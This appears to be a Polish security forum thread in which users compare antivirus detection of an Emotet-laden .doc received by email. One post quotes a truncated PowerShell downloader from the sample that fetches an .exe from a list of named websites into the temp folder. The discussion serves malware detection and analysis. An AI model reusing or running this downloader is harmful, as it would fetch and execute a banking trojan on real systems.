16.07.2018, 22:50
Witam po kilku letniej przerwie- Gdata wykrył Trojan .GenericKD.31077014.
Paczki, malware, złośliwe pliki, linki itp.
|
16.07.2018, 22:50
Witam po kilku letniej przerwie- Gdata wykrył Trojan .GenericKD.31077014.
18.07.2018, 15:14
Otrzymałem meila z linkiem do pobrania pliku .doc. Plik zmienia się na losową nazwę.
Treść widoczna jedynie dla zarejestrowanych użytkowników Wyniki na VT: [Aby zobaczyć linki, zarejestruj się tutaj] [Aby zobaczyć linki, zarejestruj się tutaj] HitmanPro, ZAM nie wykrywa, Secureaplus wykrywa na razie pierwszy plik. Chrome blokuje i muszę odznaczyć ochronę w chromie
18.07.2018, 18:56
Kaspersky free usuwa bez pytania
Skrypt w powershell pobiera i ładuje Emotet - trojan bankowy.
Kod: $GKM=new-object Net.WebClient;$Oza='http://jandkonline.com/smp/B4Nxg4v/@http://michaelkammes.com/N9vdTTT/@http://www.wrightstexasnursery.com/1koy/@http://creative-machine.net/eh0HC/@http://redwire.us/rco/P5DDr/'.Split('@');$faE = '85';$mvI=$env:temp+'\'+$faE+'.exe';foreach($Rmp in $O
18.07.2018, 19:54
W wordzie mam obrazek ale nic się nie otwiera, pewnie dlatego że użyłem hardentools.
Czy to że comodo czy kaspersky free blokują te strony zależy tylko od wprowadzenia tych stron do bazy danych? czy te programy radzą sobie z wykrywaniem nieznanych zagrożeń? Tak hardentools może blokować zawartość. Comodo to zagrożenie wykrywa behawioralnie za pomocą wzorców zachowań po przez viruscope. Kaspersky myślę podobnie.
Próbka Emotet Treść widoczna jedynie dla zarejestrowanych użytkowników
18.07.2018, 20:42
Kaspersky rozpoznaje a SecureAplus nie
Kaspersky free blokuje odnośnik do strony a wyłączony - po włączeniu rozpoznaje zagrożenie, secureaplus wykrywa plik po pobraniu (z silnika eset).
Comodo Cloud AV nie wykrywa nic. Secure dalej nic ... secureaplus wykrywa plik po pobraniu - a nie po rozpakowaniu go ? Jaką masz licencje ?
Cytat:Kaspersky free blokuje odnośnik do strony a wyłączonyputin sam kontroluje Twój komputer (18.07.2018, 21:11)Sillo napisał(a): jak nie putin to nsa, itp wcześniej używałem kaspra, ostatnio Appguard + SS + Hitman na żądanie. Dzisiaj zainstalowałem Secureaplus i KF na próbę
18.07.2018, 21:57
aha, to juz wiem czemu - mam free , masz info na temat premium za free ?
18.07.2018, 22:12
MKS Vir nie wykrywa....
Wykrywają go : Secure a plus Premium silnikiem Eset Zemana Immunet Windows Defender Wysyłam plik do analizy labu MKS
19.07.2018, 10:18
(18.07.2018, 21:57)Sillo napisał(a):Niestety nie, ostatnie promo było w maju.
19.07.2018, 11:15
Bitdefender 2019 i Secureaplus 5 beta wykrywają po rozpakowaniu (Secure silnikiem Eset).
20.07.2018, 13:07
Comodo Cloud AV wykrywa sygnaturą, a po wyłączeniu AV Viruscope wykrywa.
[Aby zobaczyć linki, zarejestruj się tutaj]
25.07.2018, 23:11
Ostatnio poszła spora kampania na modx (próbowali też na wordpress, ale troszku im nie wyszło)
Poniżej pliki które wyodrębniłem z masy strony: .ico - sterowniki do kampanii spamowej 2 coiny kilka zaszyfrowanych plików, niestety nie udało mi się ich odszyfrować, może ktoś da radę. Treść widoczna jedynie dla zarejestrowanych użytkowników Vt nic nie wykrywa, przy pobieraniu z ftp Norton jedynie wywalił wszystkie js, rozpoznanie Nortona: [Aby zobaczyć linki, zarejestruj się tutaj]
26.07.2018, 09:11
O kurczaki starość
"safegroup" |
« Starszy wątek | Nowszy wątek »
|